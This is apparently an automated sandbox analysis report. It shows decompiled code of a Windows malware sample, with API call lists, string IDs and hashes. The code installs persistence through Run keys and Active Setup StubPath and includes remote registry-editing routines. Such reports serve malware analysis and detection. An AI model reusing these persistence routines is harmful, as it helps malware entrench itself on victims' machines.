							_t272 =  *0x2405ab88; // 0x2405b8fc
							E24013274( &_v60, E24013534( *_t272));
							_push(_v60);
							E24013274( &_v64, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
							_pop(_t328);
							E24016858(0x80000001, _t311, _t328, _v64, _t394, _t402);
						}
					}
					_t403 =  *_t393;
					if(_t403 != 0) {
						_push(0);
						_push( &_v68);
						E24013274( &_v72, E24013534( *_t393));
						_push(_v72);
						E24013274( &_v76, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
						_pop(_t323);
						E240170B8(0x80000002, _t311, _t323, _v76, _t394, _t403);
						E24013480(_v68,  *_t311);
						if(_t403 != 0) {
							E24013274( &_v80, E24013534( *_t311));
							_push(_v80);
							E24013274( &_v84, E24013534( *_t393));
							_push(_v84);
							E24013274( &_v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
							_pop(_t326);
							E24016858(0x80000002, _t311, _t326, _v88, _t394, _t403);
						}
						_push(0);
						_push( &_v92);
						E24013274( &_v96, E24013534( *_t393));
						_push(_v96);
						E24013274( &_v100, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
						_pop(_t324);
						E240170B8(0x80000001, _t311, _t324, _v100, _t394, _t403);
						E24013480(_v92,  *_t311);
						if(_t403 != 0) {
							E24013274( &_v104, E24013534( *_t311));
							_push(_v104);
							E24013274( &_v108, E24013534( *_t393));
							_push(_v108);
							E24013274( &_v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
							_pop(_t325);
							E24016858(0x80000001, _t311, _t325, _v112, _t394, _t403);
						}
					}
					_t95 =  *0x2405ab8c; // 0x2405b8f4
					_t404 =  *_t95;
					if(_t404 != 0) {
						_push(0);
						_push( &_v116);
						E24013274( &_v120, "StubPath");
						_push(_v120);
						_t317 =  *0x2405ab8c; // 0x2405b8f4
						E24013388( &_v128,  *_t317, "Software\\Microsoft\\Active Setup\\Installed Components\\");
						E24013274( &_v124, E24013534(_v128));
						_pop(_t319);
						E240170B8(0x80000002, _t311, _t319, _v124, _t394, _t404);
						E24013480(_v116,  *_t311);
						if(_t404 != 0) {
							E24013274( &_v132, E24013534( *_t311));
							_push(_v132);
							E24013274( &_v136, "StubPath");
							_push(_v136);
							_t320 =  *0x2405ab8c; // 0x2405b8f4
							E24013388( &_v144,  *_t320, "Software\\Microsoft\\Active Setup\\Installed Components\\");
							E24013274( &_v140, E24013534(_v144));
							_pop(_t322);
							E24016858(0x80000002, _t311, _t322, _v140, _t394, _t404);
						}
						RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006,  &_v16);
						_t179 =  *0x2405ab8c; // 0x2405b8f4
						RegDeleteKeyA(_v16, E24013534( *_t179));
						RegCloseKey(_v16);
					}
					_t334 =  *0x2405ac14; // 0x2405b94c
					_t335 =  *_t334;
					E24013388( &_v148, 0x240558c0, _t335);
					_t395 = E24014F18(0, 0, E24013534(_v148));
					if(GetLastError() != 0xb7) {
						CloseHandle(_t395);
						__eflags = E24016C78( *_t311, _t311, __eflags);
						if(__eflags == 0) {
							L24:
							E24016634( *_t311, _t311, _t393, _t395, __eflags);
							E24016588( *_t311, _t311,  &_v156, _t393, _t395, __eflags);
							E24013274( &_v152, E24013534(_v156));
							E24017450(_v152, _t311, __eflags);
							E24016DA0( *_t311, _t311, _v12, _v8, _t395, __eflags);
							_t117 =  *0x2405ac5c; // 0x2405b94a
							__eflags =  *_t117 - 1;
							if( *_t117 == 1) {
								__eflags = 0;
								E240115E0(0,  &_v160);
								E24013480( *_t311, _v160);
								if(__eflags != 0) {
									E2401757C( *_t311, _t311, _t395, __eflags);
									E24016588( *_t311, _t311,  &_v164, _t393, _t395, __eflags);
									E24017668(_v164, _t311, __eflags);
								}
							}
							_t118 =  *0x2405ab74; // 0x2405b949
							__eflags =  *_t118 - 1;
							if( *_t118 == 1) {
								__eflags = 0;
								E240115E0(0,  &_v168);
								E24013480( *_t311, _v168);
								if(__eflags != 0) {
									E24017728( *_t311, _t311, _t395, __eflags);
									E24016588( *_t311, _t311,  &_v172, _t393, _t395, __eflags);
									E24017728(_v172, _t311, _t395, __eflags);
								}
							}
							L30:
							_t119 =  *0x2405ac14; // 0x2405b94c
							_t394 = E24014F18(0, 0, E24013534( *_t119));
							_t123 = GetLastError();
							__eflags = _t123 - 0xb7;
							if(_t123 != 0xb7) {
								CloseHandle(_t394);
								E240166E4(0, E24013534( *_t311), 0x240558cc, 0, 0, 0x240558c8);
							} else {
								CloseHandle(_t394);
							}
							continue;
						}
						_t151 = E24016438( *_t311, _t311, 0x240558c0, __eflags);
						_push(_t335);
						_push(_t151);
						_t152 = _v12;
						__eflags = 0 - _v40;
						if(__eflags == 0) {
							__eflags = _t152 - _v44;
						}
						if(__eflags == 0) {
							goto L30;
						} else {
							goto L24;
						}
					} else {
						CloseHandle(_t395);
						_t155 =  *0x2405ac4c; // 0x2405b9a0
						CloseHandle( *_t155);
						_pop(_t390);
						 *[fs:eax] = _t390;
						_push(0x240557ba);
						E240130AC( &_v172, 0x27);
						return E24013088( &_v8);
					}
				}
				L1:
				_push(0);
				_push(0);
				_t312 = _t312 - 1;
				if(_t312 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_push(__esi);
					_t311 =  *0x2405ac24; // 0x2405b980
					_t393 =  *0x2405abd0; // 0x2405b900
					_push(_t397);
					_push(0x240557b3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t398;
					E24016CE4( *_t311, _t311,  &_v8,  &_v12, _t393, __esi, 0);
					goto L3;
				}
			}





















































































                                    0x24055240
                                    0x24055241
                                    0x24055243
                                    0x24055243
                                    0x24055279
                                    0x24055279
                                    0x2405527e
                                    0x24055283
                                    0x24055288
                                    0x2405528b
                                    0x24055291
                                    0x24055296
                                    0x24055297
                                    0x240552a8
                                    0x240552b0
                                    0x240552b9
                                    0x240552c6
                                    0x240552c7
                                    0x240552d1
                                    0x240552d6
                                    0x240552e4
                                    0x240552ec
                                    0x240552ed
                                    0x240552fe
                                    0x24055306
                                    0x2405530f
                                    0x2405531c
                                    0x2405531d
                                    0x2405531d
                                    0x240552d6
                                    0x24055322
                                    0x24055327
                                    0x2405532a
                                    0x24055330
                                    0x24055335
                                    0x24055336
                                    0x24055347
                                    0x2405534f
                                    0x24055358
                                    0x24055365
                                    0x24055366
                                    0x24055370
                                    0x24055375
                                    0x24055383
                                    0x2405538b
                                    0x2405538c
                                    0x2405539d
                                    0x240553a5
                                    0x240553ae
                                    0x240553bb
                                    0x240553bc
                                    0x240553bc
                                    0x24055375
                                    0x240553c1
                                    0x240553c4
                                    0x240553ca
                                    0x240553cf
                                    0x240553dc
                                    0x240553e4
                                    0x240553ed
                                    0x240553fa
                                    0x240553fb
                                    0x24055405
                                    0x2405540a
                                    0x24055418
                                    0x24055420
                                    0x2405542d
                                    0x24055435
                                    0x2405543e
                                    0x2405544b
                                    0x2405544c
                                    0x2405544c
                                    0x24055451
                                    0x24055456
                                    0x24055463
                                    0x2405546b
                                    0x24055474
                                    0x24055481
                                    0x24055482
                                    0x2405548c
                                    0x24055491
                                    0x2405549f
                                    0x240554a7
                                    0x240554b4
                                    0x240554bc
                                    0x240554c5
                                    0x240554d2
                                    0x240554d3
                                    0x240554d3
                                    0x24055491
                                    0x240554d8
                                    0x240554dd
                                    0x240554e0
                                    0x240554e6
                                    0x240554eb
                                    0x240554f4
                                    0x240554fc
                                    0x240554fd
                                    0x2405550d
                                    0x2405551f
                                    0x2405552c
                                    0x2405552d
                                    0x24055537
                                    0x2405553c
                                    0x2405554a
                                    0x24055552
                                    0x2405555e
                                    0x24055569
                                    0x2405556f
                                    0x2405557d
                                    0x24055595
                                    0x240555a5
                                    0x240555a6
                                    0x240555a6
                                    0x240555c0
                                    0x240555c5
                                    0x240555d6
                                    0x240555df
                                    0x240555df
                                    0x240555e4
                                    0x240555ea
                                    0x240555f7
                                    0x24055611
                                    0x2405561d
                                    0x24055638
                                    0x24055644
                                    0x24055646
                                    0x24055667
                                    0x24055669
                                    0x24055676
                                    0x2405568e
                                    0x24055699
                                    0x240556a6
                                    0x240556ab
                                    0x240556b0
                                    0x240556b3
                                    0x240556bb
                                    0x240556bd
                                    0x240556ca
                                    0x240556cf
                                    0x240556d3
                                    0x240556e0
                                    0x240556eb
                                    0x240556eb
                                    0x240556cf
                                    0x240556f0
                                    0x240556f5
                                    0x240556f8
                                    0x24055700
                                    0x24055702
                                    0x2405570f
                                    0x24055714
                                    0x24055718
                                    0x24055725
                                    0x24055730
                                    0x24055730
                                    0x24055714
                                    0x24055735
                                    0x24055735
                                    0x2405574b
                                    0x2405574d
                                    0x24055752
                                    0x24055757
                                    0x24055765
                                    0x24055783
                                    0x24055759
                                    0x2405575a
                                    0x2405575a
                                    0x00000000
                                    0x24055757
                                    0x2405564a
                                    0x2405564f
                                    0x24055650
                                    0x24055651
                                    0x24055656
                                    0x2405565a
                                    0x2405565c
                                    0x2405565c
                                    0x24055661
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2405561f
                                    0x24055620
                                    0x24055625
                                    0x2405562d
                                    0x2405578f
                                    0x24055792
                                    0x24055795
                                    0x240557a5
                                    0x240557b2
                                    0x240557b2
                                    0x2405561d
                                    0x24055248
                                    0x24055248
                                    0x2405524a
                                    0x2405524c
                                    0x2405524d
                                    0x00000000
                                    0x2405524f
                                    0x2405524f
                                    0x24055250
                                    0x24055252
                                    0x24055258
                                    0x24055260
                                    0x24055261
                                    0x24055266
                                    0x24055269
                                    0x24055274
                                    0x00000000
                                    0x24055274

                                    APIs
                                    • Sleep.KERNEL32(00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 2405527E
                                      • Part of subcall function 24016858: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 2401689E
                                      • Part of subcall function 24016858: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168C6
                                      • Part of subcall function 24016858: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 240555C0
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 240555D6
                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,00000000,00001388,00000000,240557B3), ref: 240555DF
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 24055613
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 24055620
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 2405562D
                                      • Part of subcall function 240170B8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 2401710D
                                      • Part of subcall function 240170B8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 24017131
                                      • Part of subcall function 240170B8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 2401715B
                                      • Part of subcall function 240170B8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197), ref: 2401716F
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 24055638
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 2405574D
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000), ref: 2405575A
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000), ref: 24055765
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Close$Handle$Value$ErrorLastOpenQuery$CreateDeleteSleep
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run$StubPath$_SAIR$open
                                    • API String ID: 3574299486-1043091203
                                    • Opcode ID: d8260fa19f0db3977ddd100e4d0309d3fd9abb12ab579e73a4ae9fe8752ce983
                                    • Instruction ID: 489dbcfe62d0460f03106508f995dbe181dab17fb4f0b1949807b5604defe5a1
                                    • Opcode Fuzzy Hash: d8260fa19f0db3977ddd100e4d0309d3fd9abb12ab579e73a4ae9fe8752ce983
                                    • Instruction Fuzzy Hash: 6DF10875A001589BEF00EBA8D880E8EB7F9FF65248F504165E409BB26CDA74EEC5CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402B7D0, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 300registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 80%
                                    			E2402B7D0(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* __ecx;
				void* _t126;
				void* _t128;
				void* _t134;
				char* _t141;
				signed int _t144;
				signed int _t165;
				signed int _t174;
				void* _t176;
				int _t183;
				char* _t185;
				long _t189;
				signed int _t196;
				void* _t198;
				signed int _t203;
				int _t219;
				signed int _t224;
				int _t228;
				char* _t230;
				signed int _t234;
				char* _t237;
				intOrPtr _t254;
				void* _t279;
				void* _t281;
				intOrPtr _t283;
				intOrPtr _t285;
				void* _t296;
				char _t299;
				intOrPtr _t312;
				intOrPtr _t313;
				void* _t316;

				_t310 = __esi;
				_t309 = __edi;
				_t312 = _t313;
				_t254 = 5;
				do {
					_push(0);
					_push(0);
					_t254 = _t254 - 1;
					_t315 = _t254;
				} while (_t254 != 0);
				_push(_t254);
				_t1 =  &_v8;
				 *_t1 = _t254;
				_push(__ebx);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				E24013524(_v12);
				E24013524(_v16);
				_push(_t312);
				_push(0x2402bb82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t313;
				_t249 = 0;
				E24013590(_v8, E24013674(0x2402bb98, _v8) - 1, 1,  &_v28);
				E240135D0( &_v8, E24013674(0x2402bb98, _v8), 1);
				_push( &_v24);
				_t126 = E2402B35C(_v8, 0, 0x5c, __edi, __esi, _t315) + 1;
				_t316 = _t126;
				_t128 = E2401333C(_v8);
				_t279 = _t126;
				E24013590(_v8, _t128, _t279);
				_push(E2402B35C(_v8, 0, 0x5c, __edi, __esi, _t316));
				_t134 = E2401333C(_v8);
				_pop(_t281);
				E240135D0( &_v8, _t134, _t281);
				E24013480(_v16, 0x2402bba4);
				if(_t316 != 0) {
					_t141 = E24013534(_v8);
					_t144 = RegOpenKeyExA(E2402B224(_v28, 0, __eflags), _t141, 0, 2,  &_v20);
					__eflags = _t144;
					if(_t144 != 0) {
						__eflags = 0;
					} else {
						E24013480(_v16, "REG_SZ");
						if(__eflags == 0) {
							_t228 = E2401333C(_v12);
							_t230 = E24013534(_v12);
							_t234 = RegSetValueExA(_v20, E24013534(_v24), 0, 1, _t230, _t228);
							__eflags = _t234;
							_t40 = _t234 == 0;
							__eflags = _t40;
							_t249 = 0 | _t40;
						}
						E24013480(_v16, "REG_BINARY");
						if(__eflags == 0) {
							_t198 = E2401333C(_v12);
							_t299 = _v12;
							__eflags =  *((char*)(_t299 + _t198 - 1)) - 0x20;
							if( *((char*)(_t299 + _t198 - 1)) != 0x20) {
								E24013344( &_v12, 0x2402bbd8);
							}
							E24013120( &_v32, _v12);
							_v40 = 0;
							_t203 = E2401333C(_v32);
							asm("cdq");
							_push(_t203 / 3);
							E240144F4();
							while(1) {
								__eflags = _v32;
								if(_v32 == 0) {
									break;
								}
								E24013590(_v32, E24013674(0x2402bbd8, _v32) - 1, 0,  &_v44);
								_v36[_v40] = E2402B6E8(_v44, _t249, _t309, _t310, __eflags);
								E240135D0( &_v32, E24013674(0x2402bbd8, _v32) + 1, 1);
								_t65 =  &_v40;
								 *_t65 = _v40 + 1;
								__eflags =  *_t65;
							}
							_t219 = E24014338(_v36);
							_t224 = RegSetValueExA(_v20, E24013534(_v24), 0, 3, _v36, _t219);
							__eflags = _t224;
							_t73 = _t224 == 0;
							__eflags = _t73;
							_t249 = _t249 & 0xffffff00 | _t73;
						}
						E24013480(_v16, "REG_DWORD");
						if(__eflags == 0) {
							_v40 = E2402ACD0(_v12, __eflags);
							_t196 = RegSetValueExA(_v20, E24013534(_v24), 0, 4,  &_v40, 4);
							__eflags = _t196;
							_t81 = _t196 == 0;
							__eflags = _t81;
							_t249 = _t249 & 0xffffff00 | _t81;
						}
						E24013480(_v16, "REG_MULTI_SZ");
						if(__eflags == 0) {
							while(1) {
								_t165 = E24013674(0x2402bc10, _v12);
								__eflags = _t165;
								if(_t165 <= 0) {
									break;
								}
								E24013590(_v12, E24013674(0x2402bc10, _v12) - 1, 1,  &_v48);
								_push(_v48);
								_push(0x2402bc1c);
								_push( &_v52);
								_t174 = E24013674(0x2402bc10, _v12) + 2;
								__eflags = _t174;
								_t176 = E2401333C(_v12);
								_t296 = _t174;
								E24013590(_v12, _t176, _t296);
								_push(_v52);
								E240133FC();
							}
							E24013344( &_v12, 0x2402bc28);
							_t183 = E2401333C(_v12);
							_t185 = E24013534(_v12);
							_t189 = RegSetValueExA(_v20, E24013534(_v24), 0, 7, _t185, _t183);
							_t189 = _t189 == 0;
						}
						RegCloseKey(_v20);
					}
				} else {
					_t237 = E24013534(_v8);
					RegOpenKeyExA(E2402B224(_v28, 0, _t316), _t237, 0, 4,  &_v20);
					RegCreateKeyA(_v20, E24013534(_v24),  &_v20);
					RegCloseKey(_v20);
				}
				_pop(_t283);
				 *[fs:eax] = _t283;
				_push(0x2402bb89);
				E240130AC( &_v52, 3);
				_t285 =  *0x2402b7a8; // 0x2402b7ac
				E24014500( &_v36, _t285);
				E240130AC( &_v32, 3);
				return E240130AC( &_v16, 3);
			}














































                                    0x2402b7d0
                                    0x2402b7d0
                                    0x2402b7d1
                                    0x2402b7d4
                                    0x2402b7d9
                                    0x2402b7d9
                                    0x2402b7db
                                    0x2402b7dd
                                    0x2402b7dd
                                    0x2402b7dd
                                    0x2402b7e0
                                    0x2402b7e1
                                    0x2402b7e1
                                    0x2402b7e4
                                    0x2402b7e5
                                    0x2402b7e8
                                    0x2402b7eb
                                    0x2402b7f1
                                    0x2402b7f9
                                    0x2402b801
                                    0x2402b808
                                    0x2402b809
                                    0x2402b80e
                                    0x2402b811
                                    0x2402b814
                                    0x2402b832
                                    0x2402b84e
                                    0x2402b856
                                    0x2402b861
                                    0x2402b861
                                    0x2402b866
                                    0x2402b870
                                    0x2402b871
                                    0x2402b880
                                    0x2402b884
                                    0x2402b88e
                                    0x2402b88f
                                    0x2402b89c
                                    0x2402b8a1
                                    0x2402b8f6
                                    0x2402b905
                                    0x2402b90a
                                    0x2402b90c
                                    0x2402bb3d
                                    0x2402b912
                                    0x2402b91a
                                    0x2402b91f
                                    0x2402b924
                                    0x2402b92d
                                    0x2402b944
                                    0x2402b949
                                    0x2402b94b
                                    0x2402b94b
                                    0x2402b94b
                                    0x2402b94b
                                    0x2402b956
                                    0x2402b95b
                                    0x2402b964
                                    0x2402b969
                                    0x2402b96c
                                    0x2402b971
                                    0x2402b97b
                                    0x2402b97b
                                    0x2402b986
                                    0x2402b98d
                                    0x2402b993
                                    0x2402b99d
                                    0x2402b9a0
                                    0x2402b9af
                                    0x2402ba08
                                    0x2402ba08
                                    0x2402ba0c
                                    0x00000000
                                    0x00000000
                                    0x2402b9d2
                                    0x2402b9e5
                                    0x2402ba00
                                    0x2402ba05
                                    0x2402ba05
                                    0x2402ba05
                                    0x2402ba05
                                    0x2402ba11
                                    0x2402ba2c
                                    0x2402ba31
                                    0x2402ba33
                                    0x2402ba33
                                    0x2402ba33
                                    0x2402ba33
                                    0x2402ba3e
                                    0x2402ba43
                                    0x2402ba4d
                                    0x2402ba67
                                    0x2402ba6c
                                    0x2402ba6e
                                    0x2402ba6e
                                    0x2402ba6e
                                    0x2402ba6e
                                    0x2402ba79
                                    0x2402ba7e
                                    0x2402bae7
                                    0x2402baef
                                    0x2402baf4
                                    0x2402baf6
                                    0x00000000
                                    0x00000000
                                    0x2402baa2
                                    0x2402baa7
                                    0x2402baaa
                                    0x2402bab2
                                    0x2402bac0
                                    0x2402bac0
                                    0x2402bac7
                                    0x2402bad1
                                    0x2402bad2
                                    0x2402bad7
                                    0x2402bae2
                                    0x2402bae2
                                    0x2402bb00
                                    0x2402bb08
                                    0x2402bb11
                                    0x2402bb28
                                    0x2402bb2f
                                    0x2402bb2f
                                    0x2402bb36
                                    0x2402bb36
                                    0x2402b8a3
                                    0x2402b8ae
                                    0x2402b8bd
                                    0x2402b8d3
                                    0x2402b8e1
                                    0x2402b8e1
                                    0x2402bb41
                                    0x2402bb44
                                    0x2402bb47
                                    0x2402bb54
                                    0x2402bb5c
                                    0x2402bb62
                                    0x2402bb6f
                                    0x2402bb81

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000004,?,?,?,00000000,2402BB82,?,?,00000004,00000000,00000000), ref: 2402B8BD
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402B8D3
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000004,?,?,?,00000000,2402BB82,?,?,00000004), ref: 2402B8E1
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82,?,?,00000004,00000000,00000000), ref: 2402B905
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82), ref: 2402B944
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,?,00000000), ref: 2402BA2C
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82), ref: 2402BA67
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000007,00000000,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82), ref: 2402BB28
                                    • RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82,?,?,00000004,00000000,00000000), ref: 2402BB36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseOpen$Create
                                    • String ID: REG_BINARY$REG_DWORD$REG_MULTI_SZ$REG_SZ$clave
                                    • API String ID: 2929978649-1504967743
                                    • Opcode ID: 45def6f773d95f33cea0935d5532c0a4a5e441fb0e3b21bbb6b0cc8ae437e8c1
                                    • Instruction ID: 11ea11ba876f2ce4840d79888c876af9f1d1b9398380b42a7f6fc4c234fc24ff
                                    • Opcode Fuzzy Hash: 45def6f773d95f33cea0935d5532c0a4a5e441fb0e3b21bbb6b0cc8ae437e8c1
                                    • Instruction Fuzzy Hash: 03B1DF75A00509AFFF01DBF8C980B9EB7F9BF68608F504065E518F7298DA74EE818B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402AD24, Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 273registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E2402AD24(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v36;
				char _v40;
				char _v44;
				int* _v48;
				intOrPtr _v52;
				char _v56;
				char _v312;
				char _v568;
				char _v824;
				char _v828;
				char _v832;
				char _v836;
				char _v840;
				char _v844;
				void* _t126;
				char* _t130;
				signed int _t170;
				int _t184;
				void* _t187;
				int* _t188;
				intOrPtr _t191;
				char _t192;
				long _t207;
				intOrPtr _t219;
				void* _t223;
				char* _t245;
				char* _t247;
				void* _t250;
				void* _t263;

				_t263 = __fp0;
				_push(__ebx);
				_v844 = 0;
				_v836 = 0;
				_v840 = 0;
				_v828 = 0;
				_v832 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				_push(_t250);
				_push(0x2402b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t250 + 0xfffffcb8;
				E24013088(_v12);
				_t253 = _v8;
				if(_v8 != 0) {
					_push( &_v16);
					_push(1);
					_push(0);
					_push( &_v828);
					_push(E24013674(0x2402b11c, _v8) + 1);
					_t126 = E2401333C(_v8);
					_pop(_t223);
					E24013590(_v8, _t126, _t223);
					_t130 = E24013534(_v828);
					_t213 = E24013674(0x2402b11c, _v8) - 1;
					E24013590(_v8, E24013674(0x2402b11c, _v8) - 1, 1,  &_v832);
					RegOpenKeyExA(E2402B224(_v832, __ebx, _t253), _t130, ??, ??, ??);
					_v20 = 0;
					_t245 = E24011344(0x3fff);
					_v52 = E24012658(1);
					do {
						RegEnumValueA(_v16, _v20, _t245,  &_v24, 0,  &_v32, 0,  &_v28);
						if(_v28 > 0x3fff) {
							_v28 = 0x3fff;
						}
						_t247 = E24011344(_v28);
						_v24 = 0x3fff;
						_t207 = RegEnumValueA(_v16, _v20, _t245,  &_v24, 0,  &_v32, _t247,  &_v28);
						if(_t207 == 0) {
							E24013088( &_v40);
							if(_v32 != 4) {
								__eflags = _v32 - 3;
								if(_v32 != 3) {
									__eflags = _v32 - 7;
									if(_v32 != 7) {
										E24013274( &_v40, _t247);
									} else {
										_t184 = _v28 - 1;
										__eflags = _t184;
										if(_t184 >= 0) {
											_t187 = _t184 + 1;
											__eflags = _t187;
											_v56 = _t187;
											_v48 = 0;
											do {
												_t188 = _v48;
												__eflags = _t247[_t188];
												if(_t247[_t188] == 0) {
													_t247[_v48] = 0x20;
												}
												_v48 =  &(_v48[0]);
												_t73 =  &_v56;
												 *_t73 = _v56 - 1;
												__eflags =  *_t73;
											} while ( *_t73 != 0);
										}
										E24013274( &_v40, _t247);
									}
								} else {
									__eflags = _v28;
									if(_v28 != 0) {
										_t191 = _v28 - 1;
										__eflags = _t191;
										if(_t191 >= 0) {
											_t192 = _t191 + 1;
											__eflags = _t192;
											_v56 = _t192;
											_v48 = 0;
											do {
												_push(_v40);
												E2402AB84( &_v844, 2);
												_push(_v844);
												_push(0x2402b15c);
												E240133FC();
												_v48 =  &(_v48[0]);
												_t61 =  &_v56;
												 *_t61 = _v56 - 1;
												__eflags =  *_t61;
											} while ( *_t61 != 0);
										}
									} else {
										E24013120( &_v40, "(Empty)");
									}
								}
							} else {
								_push(0x2402b128);
								_push(0);
								E2402AC78(8,  &_v836, _t263,  *_t247);
								_push(_v836);
								_push(0x2402b134);
								E2402ACA8( *_t247,  &_v840);
								_push(_v840);
								_push(0x2402b140);
								E240133FC();
							}
							if( *_t245 != 0) {
								E24013274( &_v44, _t245);
							} else {
								E24013120( &_v44, "(Default)");
							}
							_t170 = _v32;
							if(_t170 <= 7) {
								switch( *((intOrPtr*)(_t170 * 4 +  &M2402AFC8))) {
									case 0:
										__eax =  &_v36;
										__edx = "REG_NONE";
										__eax = E24013120( &_v36, __edx);
										goto L35;
									case 1:
										__eax =  &_v36;
										__edx = "REG_SZ";
										__eax = E24013120( &_v36, __edx);
										goto L35;
									case 2:
										__eax =  &_v36;
										__edx = "REG_EXPAND_SZ";
										__eax = E24013120( &_v36, __edx);
										goto L35;
									case 3:
										E24013120( &_v36, "REG_BINARY");
										goto L35;
									case 4:
										__eax =  &_v36;
										__edx = "REG_DWORD";
										__eax = E24013120( &_v36, __edx);
										goto L35;
									case 5:
										__eax =  &_v36;
										__edx = "REG_DWORD_BIG_ENDIAN";
										__eax = E24013120( &_v36, __edx);
										goto L35;
									case 6:
										__eax =  &_v36;
										__edx = "REG_LINK";
										__eax = E24013120( &_v36, __edx);
										goto L35;
									case 7:
										__eax =  &_v36;
										__edx = "REG_MULTI_SZ";
										__eax = E24013120( &_v36, __edx);
										goto L35;
								}
							}
							L35:
							E24013318( &_v824, 0xff, _v44);
							E24013318( &_v568, 0xff, _v36);
							E24013318( &_v312, 0xff, _v40);
							_t213 = 0x300;
							E24023314(_v52, 0x300,  &_v824);
							_v20 = _v20 + 1;
						}
					} while (_t207 == 0);
